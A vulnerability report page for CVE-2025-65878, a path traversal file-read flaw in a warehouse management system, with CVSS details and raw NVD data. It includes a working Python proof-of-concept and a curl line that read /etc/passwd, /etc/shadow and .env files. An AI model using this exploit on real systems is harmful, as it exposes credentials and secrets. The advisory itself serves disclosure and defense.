Security Vulnerability Report
中文
CVE-2025-65878 CVSS 7.5 HIGH

CVE-2025-65878

Published: 2025-12-05 17:16:04
Last Modified: 2025-12-12 12:51:53
Source: [email protected]

Description

The warehouse management system version 1.2 contains an arbitrary file read vulnerability. The endpoint `/file/showImageByPath` does not sanitize user-controlled path parameters. An attacker could exploit directory traversal to read arbitrary files on the server's file system. This could lead to the leakage of sensitive system information.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:yeqifu:warehouse_management_system:1.2:*:*:*:*:*:*:* - VULNERABLE
Warehouse Management System 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys def exploit_cve_2025_65878(target_url): """ PoC for CVE-2025-65878: Warehouse Management System Arbitrary File Read Target: /file/showImageByPath endpoint """ # List of sensitive files to attempt to read sensitive_files = [ '../../../../etc/passwd', '../../../../etc/hosts', '../../../../etc/shadow', '../../../config/database.yml', '../../../.env', '../../../../var/log/syslog' ] print(f'[*] Target: {target_url}') print(f'[*] Exploiting CVE-2025-65878...') for file_path in sensitive_files: try: # Construct the malicious URL with directory traversal params = {'path': file_path} response = requests.get( f'{target_url}/file/showImageByPath', params=params, timeout=10 ) if response.status_code == 200 and len(response.content) > 0: print(f'[+] SUCCESS: Read {file_path}') print(f'Content preview: {response.text[:200]}...') return True except Exception as e: print(f'[-] Error reading {file_path}: {str(e)}') return False if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_url>') print(f'Example: python {sys.argv[0]} http://vulnerable-site.com') sys.exit(1) exploit_cve_2025_65878(sys.argv[1]) # Alternative: Direct curl command # curl "http://target.com/file/showImageByPath?path=../../../../etc/passwd"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65878", "sourceIdentifier": "[email protected]", "published": "2025-12-05T17:16:03.957", "lastModified": "2025-12-12T12:51:52.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The warehouse management system version 1.2 contains an arbitrary file read vulnerability. The endpoint `/file/showImageByPath` does not sanitize user-controlled path parameters. An attacker could exploit directory traversal to read arbitrary files on the server's file system. This could lead to the leakage of sensitive system information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yeqifu:warehouse_management_system:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "50384E84-B726-46D8-82A5-22A286E94294"}]}]}], "references": [{"url": "https://github.com/W000i/vuln/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.